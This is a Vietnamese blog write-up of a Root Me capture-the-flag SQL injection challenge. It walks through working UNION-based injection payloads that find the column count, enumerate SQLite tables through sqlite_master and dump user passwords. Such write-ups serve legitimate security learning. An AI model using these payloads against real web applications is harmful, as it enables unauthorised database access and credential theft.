Thứ Tư, 2 tháng 10, 2019

[WRITEUP] SQL INJECTION - STRING ROOTME

SAU KHI CAY ĐẮNG BỎ QUA BÀI SQL INJECTION GBK KHÔNG LÀM ĐƯỢC( MẶC DÙ ĐÃ NẮM LÝ THUYẾT VÀ THI TRIỂN HẾT CÔNG LỰC) , ĐÀNH PHẢI GẠT NƯỚC MẮT QUA VÀ TIẾP TỤC
NHÌN QUA CHALL

SQL INJECTION MÀ , QUA PAGE LOGIN NGÓ TÍ
 

  


MẤT 15 PHÚT FUZZ VÀO CÁI FORM CHẾT TIỆT NÀY DƯỚI ĐỦ HÌNH THỨC, NHẬN RA TA PHẢI QUAY ĐẦU SÁNG PAGE KHÁC .
 

TIẾP TỤC FUZZ CÂU BÁ ĐẠO

admin' or 1=1--

NOTHING HAPPEN .
THỨ XUẤT HIỆN CHỈ LÀ KẾT QUẢ TÌM KIẾM THÔNG THƯỜNG -_- . KHÔNG HIỂU DO FUZZ NHIỀU HÓA ĐIÊN HAY LÀ LINH TÍNH , TIẾP TỤC FUZZ 1 CÂU KHÁC , CÂU TÌM SỐ CỘT

admin'order by 10--
VÀ KHÔNG PHỤ LÒNG , CỦA NỢ ĐÃ XUẤT HIỆN


Warning: SQLite3::query(): Unable to prepare statement: 1, 1st ORDER BY term out of range - should be between 1 and 2 in /challenge/web-serveur/ch19/index.php on line 150 1st ORDER BY term out of range - should be between 1 and 2

HAHA . V LÀ BIẾT ĐƯỢC HỆ CSDL LÀ SQLITE3 . SỐ CỘT LÀ 2 .
TIẾP TỤC THEO QUÁN TÍNH , TÌM XEM CỘT NÀO CÓ THỂ PRINT DỮ LIỆU RA NGOÀI THÌ PHÁT HIỆN ĐÓ LÀ CỘT 1 .
SEARCH GOOGLE ĐỌC MẤT NỬA TIẾNG VỀ SQLITE3 VÀ THỬ 1 VÀI CÂU QUERY NÀO !

null' union select tbl_name,2 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--


VẬY LA CÓ 2 BẢNG LÀ "users" , "news" . DĨ NHIÊN CÁI TA QUAN TÂM LÀ CÁI GÌ THÌ KHỎI CẦN NÓI .
TIẾP TỤC TRUY VẤN TÌM SỐ CỘT CỦA MỖI BẢNG

null' union select substr(sql,1,1000),2 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'

BÙM

OK . 2 BẢNG VÀ TOÀN BỘ CỘT MỖI BẢNG ĐÃ RA ĐẦU THÚ .
CỘT TA QUAN TÂM DĨ NHIEN LÀ "username" và "password" rồi . Tôi thì chỉ quan tâm đến cột password thôi :D . kiểu gì chả có admin trong đấy .
TIẾP TỤC CÀ NHẸ

null' union select password,2 FROM users--

 

PASSWORD ĐÃ PHỌT RA RỒI , CÒN KHÔNG MAU MANG TỪNG CÁI SUBMIT XEM , CÁI NÀO DC 30K THÌ CHÍNH LÀ CHÁU NÓ


HAPPY HACKING!

Phổ Biến